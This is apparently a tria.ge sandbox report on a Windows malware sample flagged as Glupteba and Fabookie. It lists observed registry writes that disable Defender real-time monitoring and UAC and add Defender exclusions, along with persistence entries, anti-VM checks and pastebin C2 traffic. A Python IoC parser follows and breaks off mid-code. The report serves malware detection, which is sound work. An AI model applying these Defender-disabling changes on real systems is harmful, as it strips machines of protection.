Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 300s
max time network: 294s
platform: windows7_x64
resource: win7-20231215-en
resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
submitted: 04/02/2024, 03:41
Static task: static1
Behavioral task: behavioral1
Sample: 57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe
Resource: win7-20231215-en
General
Target: 57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe
Size: 177KB
MD5: 05e32cf85ff2c9c7bc92d6b751c02b1b
SHA1: 95e91a3893640d9f9dd80cf5f0f820de54fccd2a
SHA256: 57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d
SHA512: fc81e09eedb9ca907ab54cebe0f3f54cebc86f36fe036dcf0a97c131ccc5ae67832dbe902ae470b23c0dad62708555f5a4c2b4a9a71592ba5d42ee868322ed67
SSDEEP: 3072:7gMyg1MbPUWdfkUXjqYffa6R2sChyJz2OgpnGaxNTgiqOweoUEMF98sDMOSx:sgw8WdxTqcfaO2sbJbgvxNTg0weJ/W
Malware Config
Signatures
Detect Fabookie payload 2 IoCs
resource yara_rule
behavioral1/memory/1852-414-0x0000000003540000-0x000000000366C000-memory.dmp family_fabookie
behavioral1/memory/1852-422-0x0000000003540000-0x000000000366C000-memory.dmp family_fabookie
Glupteba payload 1 IoCs
resource yara_rule
behavioral1/memory/544-192-0x0000000002B30000-0x000000000341B000-memory.dmp family_glupteba
description ioc Process
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe
description ioc Process
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" conhost.exe
description ioc Process
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KCGdmeQdU = "0" reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR = "0" reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" cmd.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FohpjzYDshfCC = "0" reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt = "0" reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RZfGRCgJsrDIEOco = "0" reg.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hgFvgKbJayUn = "0" reg.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\uqeRQcQeSVSWnHVB = "0" reg.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths 57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FohpjzYDshfCC = "0" reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hgFvgKbJayUn = "0" reg.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IoHaAJhEDYhU2 = "0" reg.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\lhuGc8cD8YBgMslw3CZs4Nqs.exe = "0" lhuGc8cD8YBgMslw3CZs4Nqs.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RZfGRCgJsrDIEOco = "0" reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR = "0" reg.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IoHaAJhEDYhU2 = "0" reg.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KCGdmeQdU = "0" reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RZfGRCgJsrDIEOco = "0" reg.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths cmd.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Ahzn2Szwr26hfrPXyZRPFZkG.exe = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\uqeRQcQeSVSWnHVB = "0" reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt = "0" reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RZfGRCgJsrDIEOco = "0" reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe = "0" 57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Blocklisted process makes network request 1 IoCs
flow pid Process
100 2900 rundll32.exe
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process
2844 netsh.exe
2616 netsh.exe
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up the country code configured in the registry, likely as a geofence.
description ioc Process
Key value queried \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Control Panel\International\Geo\Nation JUNRlIz.exe
Drops startup file 8 IoCs
description ioc Process
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\O5wIQhpWgLP7UEf4RlQSymbg.bat CasPol.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CKLB7On53h12fq7Foi6NaiQn.bat CasPol.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qYRxbFWhFHxAovei7jZ0tgvr.bat CasPol.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5Dko4QvrCUvoej3yhR41KSvY.bat CasPol.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BgCvBfSl7tNkEwscYTOTD25q.bat CasPol.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rcZBdNwX1Cz8vI68m250iIBr.bat CasPol.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NiQvhTUtNTg97Gy0ZDO1nmki.bat CasPol.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CHcPwIDQzspiKJ4r7CublNdr.bat CasPol.exe
Executes dropped EXE 19 IoCs
pid Process
540 cmd.exe
544 conhost.exe
1872 3abumA8EPhmpkupXkwlsWKNH.exe
2956 Btpmb8l6OLnsIVBHYXzcfv46.exe
1520 Ahzn2Szwr26hfrPXyZRPFZkG.exe
884 lhuGc8cD8YBgMslw3CZs4Nqs.exe
2340 Fku5AId0LuZ4E8yzod75BtEi.exe
700 conhost.exe
2960 Install.exe
2156 csrss.exe
1852 OQrMVozqayLadUiGGxpM2SWK.exe
2556 Install.exe
1628 patch.exe
2596 injector.exe
1716 wxzSv0RPCLFiIJpPm8GSlIWp.exe
2268 eYLayuZ.exe
2848 windefender.exe
2348 windefender.exe
1948 JUNRlIz.exe
Loads dropped DLL 40 IoCs
pid Process
1800 CasPol.exe
1800 CasPol.exe
1800 CasPol.exe
1800 CasPol.exe
1800 CasPol.exe
1872 3abumA8EPhmpkupXkwlsWKNH.exe
1800 CasPol.exe
2956 Btpmb8l6OLnsIVBHYXzcfv46.exe
2956 Btpmb8l6OLnsIVBHYXzcfv46.exe
2956 Btpmb8l6OLnsIVBHYXzcfv46.exe
1800 CasPol.exe
2340 Fku5AId0LuZ4E8yzod75BtEi.exe
2956 Btpmb8l6OLnsIVBHYXzcfv46.exe
2960 Install.exe
2960 Install.exe
2960 Install.exe
1520 Ahzn2Szwr26hfrPXyZRPFZkG.exe
1520 Ahzn2Szwr26hfrPXyZRPFZkG.exe
1800 CasPol.exe
2960 Install.exe
2556 Install.exe
2556 Install.exe
2556 Install.exe
864 Process not Found
1872 3abumA8EPhmpkupXkwlsWKNH.exe
1628 patch.exe
1628 patch.exe
1628 patch.exe
1628 patch.exe
1628 patch.exe
2156 csrss.exe
1800 CasPol.exe
1800 CasPol.exe
1628 patch.exe
1628 patch.exe
1628 patch.exe
2900 rundll32.exe
2900 rundll32.exe
2900 rundll32.exe
2900 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
resource yara_rule
behavioral1/files/0x0031000000018646-199.dat upx
behavioral1/memory/1872-209-0x0000000000110000-0x00000000005F8000-memory.dmp upx
behavioral1/files/0x0031000000018646-201.dat upx
behavioral1/files/0x0031000000018646-202.dat upx
behavioral1/memory/1872-432-0x0000000000110000-0x00000000005F8000-memory.dmp upx
behavioral1/memory/2848-484-0x0000000000400000-0x00000000008DF000-memory.dmp upx
behavioral1/memory/2348-486-0x0000000000400000-0x00000000008DF000-memory.dmp upx
behavioral1/memory/2848-485-0x0000000000400000-0x00000000008DF000-memory.dmp upx
behavioral1/memory/2348-502-0x0000000000400000-0x00000000008DF000-memory.dmp upx
behavioral1/memory/2348-523-0x0000000000400000-0x00000000008DF000-memory.dmp upx
description ioc Process
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\lhuGc8cD8YBgMslw3CZs4Nqs.exe = "0" lhuGc8cD8YBgMslw3CZs4Nqs.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" cmd.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Ahzn2Szwr26hfrPXyZRPFZkG.exe = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths 57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions 57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe = "0" 57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths cmd.exe
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process
Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" lhuGc8cD8YBgMslw3CZs4Nqs.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe
Checks for any installed AV software in registry 1 TTPs 1 IoCs
description ioc Process
Key opened \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast Install.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops Chrome extension 2 IoCs
description ioc Process
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json JUNRlIz.exe
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json JUNRlIz.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc
5 pastebin.com
6 pastebin.com
Manipulates WinMonFS driver 1 IoCs
Rootkits write to WinMonFS to hide directories and files from detection.
description ioc Process
File opened for modification \??\WinMonFS csrss.exe
Modifies boot configuration data using bcdedit 1 IoCs
pid Process
300 bcdedit.exe
Drops file in System32 directory 21 IoCs
description ioc Process
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol JUNRlIz.exe
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini eYLayuZ.exe
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk conhost.exe
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat JUNRlIz.exe
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA JUNRlIz.exe
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_8CFD0F060456F65ABC9E95E41A1F781C JUNRlIz.exe
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_D50E9269859FFB5A738F673D82E63752 JUNRlIz.exe
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_5715DE550AA680C2FBA40D3A4F6608E9 JUNRlIz.exe
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_5715DE550AA680C2FBA40D3A4F6608E9 JUNRlIz.exe
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol eYLayuZ.exe
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA JUNRlIz.exe
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA JUNRlIz.exe
File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA JUNRlIz.exe
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_8CFD0F060456F65ABC9E95E41A1F781C JUNRlIz.exe
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_D50E9269859FFB5A738F673D82E63752 JUNRlIz.exe
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol eYLayuZ.exe
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target
PID 700 set thread context of 1800 700 conhost.exe 30
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process
File opened (read-only) \??\VBoxMiniRdrDN lhuGc8cD8YBgMslw3CZs4Nqs.exe
File opened (read-only) \??\VBoxMiniRdrDN Ahzn2Szwr26hfrPXyZRPFZkG.exe
Drops file in Program Files directory 13 IoCs
description ioc Process
File created C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\mpwJHFM.dll JUNRlIz.exe
File created C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\nwEoeMi.xml JUNRlIz.exe
File created C:\Program Files (x86)\FohpjzYDshfCC\RFVLhGx.xml JUNRlIz.exe
File created C:\Program Files (x86)\KCGdmeQdU\epaRtk.dll JUNRlIz.exe
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi JUNRlIz.exe
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi JUNRlIz.exe
File created C:\Program Files (x86)\hgFvgKbJayUn\WikVRHL.dll JUNRlIz.exe
File created C:\Program Files (x86)\KCGdmeQdU\fcltJmr.xml JUNRlIz.exe
File created C:\Program Files (x86)\FohpjzYDshfCC\ojxihoQ.dll JUNRlIz.exe
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak JUNRlIz.exe
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja JUNRlIz.exe
File created C:\Program Files (x86)\IoHaAJhEDYhU2\uehpZamRStCkJ.dll JUNRlIz.exe
File created C:\Program Files (x86)\IoHaAJhEDYhU2\BzYRdwG.xml JUNRlIz.exe
Drops file in Windows directory 14 IoCs
description ioc Process
File created C:\Windows\Tasks\YsLxjqvMZrWymyIEG.job schtasks.exe
File created C:\Windows\unins000.dat conhost.exe
File opened for modification C:\Windows\rss Ahzn2Szwr26hfrPXyZRPFZkG.exe
File opened for modification C:\Windows\rss lhuGc8cD8YBgMslw3CZs4Nqs.exe
File created C:\Windows\rss\csrss.exe lhuGc8cD8YBgMslw3CZs4Nqs.exe
File created C:\Windows\Logs\CBS\CbsPersist_20240204034220.cab reg.exe
File created C:\Windows\Tasks\bwKBwqZYjkqxftWshF.job conhost.exe
File created C:\Windows\windefender.exe csrss.exe
File created C:\Windows\Tasks\EtrQGzrpWMpnyWxNE.job schtasks.exe
File created C:\Windows\is-APIAD.tmp conhost.exe
File opened for modification C:\Windows\unins000.dat conhost.exe
File created C:\Windows\rss\csrss.exe Ahzn2Szwr26hfrPXyZRPFZkG.exe
File opened for modification C:\Windows\windefender.exe csrss.exe
File created C:\Windows\Tasks\SMPpzaSdDqsJvHF.job schtasks.exe
Launches sc.exe 1 IoCs
Sc.exe is a Windows utility to control services on the system.
pid Process
700 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process
2628 schtasks.exe
2416 schtasks.exe
2592 schtasks.exe
2392 schtasks.exe
1600 schtasks.exe
1616 schtasks.exe
1196 schtasks.exe
1312 schtasks.exe
1136 schtasks.exe
2276 schtasks.exe
2328 schtasks.exe
2772 schtasks.exe
2580 schtasks.exe
1600 schtasks.exe
3052 schtasks.exe
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe
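The Defender, UAC, persistence and anti-analysis signatures above are all printed as one string per event: an action, a registry or file target, an optional value, and the process that did it. The Python below is an added example, not tria.ge's code, that parses that string form and tags each event with the behaviour it evidences. The sample lines are copied from the tables in this report; the tag names, the SYSTEM_NAMES list and the hive split are this example's own choices.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Constructed sample: IoC strings copied from the signature tables in this report,
# in the "action target [= value] process" form tria.ge prints them in.
SAMPLE_IOCS = [
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" conhost.exe',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RZfGRCgJsrDIEOco = "0" reg.exe',
    r'Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" Ahzn2Szwr26hfrPXyZRPFZkG.exe',
    r'File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\O5wIQhpWgLP7UEf4RlQSymbg.bat CasPol.exe',
    r'File created C:\Windows\rss\csrss.exe lhuGc8cD8YBgMslw3CZs4Nqs.exe',
    r'Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe',
    r'File opened (read-only) \??\VBoxMiniRdrDN lhuGc8cD8YBgMslw3CZs4Nqs.exe',
    r'Key value queried \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Control Panel\International\Geo\Nation JUNRlIz.exe',
]

IOC_RE = re.compile(
    r"^(?P<action>Set value \((?:int|str|data)\)|Key (?:created|opened|value queried)|"
    r"File (?:created|opened for modification|opened \(read-only\)))\s+"
    r"(?P<target>.+?)(?:\s+=\s+(?P<value>.*?))?\s+(?P<process>\S+)$"
)
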